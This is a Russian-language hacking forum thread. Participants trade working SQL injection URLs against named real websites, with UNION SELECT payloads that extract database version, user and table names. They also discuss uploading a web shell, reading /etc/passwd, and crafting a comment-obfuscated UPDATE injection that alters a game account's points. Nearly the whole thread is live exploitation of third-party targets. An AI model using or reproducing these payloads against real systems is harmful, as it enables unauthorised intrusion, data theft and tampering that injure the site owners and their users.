http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10%23 p.s. не забудь +++ поставить я всетаки знаменитым хачу быть как Gorev...///=)))
Хм жаль беспокоить Как я могу загрузить оболочку здесь? Code: http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,17--
моно ли тут прочитать etc/passwd? http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,3,4,5,6,7,8,9--
Через phpbb который там есть (по крайней мере есть таблица phpbb3_acl_users) http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables-- Админка (не форума http://www.vales.by/admin/login.php) Прочитать, кажись нельзя, но залить шелл возможно получится: http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,concat_ws%280x3a,table_name%29,4,5,6,7,8,9+from+information_schema.tables+--+ Есть несколько форумов и так далее....
Привет Всем! Подскажите правильно я перевел этот код: UPDATE dbo.Character SET AddPoint = AddPoint + 1 WHERE AccountID = 'login' На вот этот: 'update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='login'
Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед update не нужен)
union+update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='killro0000' Типо так?
Если нужен инкремент addpoint, то /set/**/addpoint='addpoint'+1/ без union, это я обшибся малость Вот пример http://www.mysql.ru/webboard/index.html?n1=1160&n2=2
Все равно, не могу найти. Набираю в браузере: http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,user(),4,5,6,7,8,9,10%23 и, где выводиться user()?
Code: http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1 Бд - McAccess Имхо, одна из самых неблагодарных субд для проведения инъекций) И к тому же из-за наличия второго запроса с иным количеством полей мы не получим вывод) Так что советую поискать другие параметры, бо (проверил) они там присутствуют. З.ы - более подробно можно почитать тут: https://forum.antichat.ru/threadnav50550-1.html
Не могли бы вы уточнить, как вы нашли таблицу from CalProd. Это brutforce или какой то иной способ? Заранее спасибо за ответ.
Таблицу нашел исходя из сообщения об ошибке вот тут: Code: http://calidad.com.au/FindProdStep1.asp?MAN=Olivetti%27%29 Других способов узнать имена таблиц (кроме перебора, конечно же) в данном случае нет. Так как доступ к таблице MSysObjects закрыт.
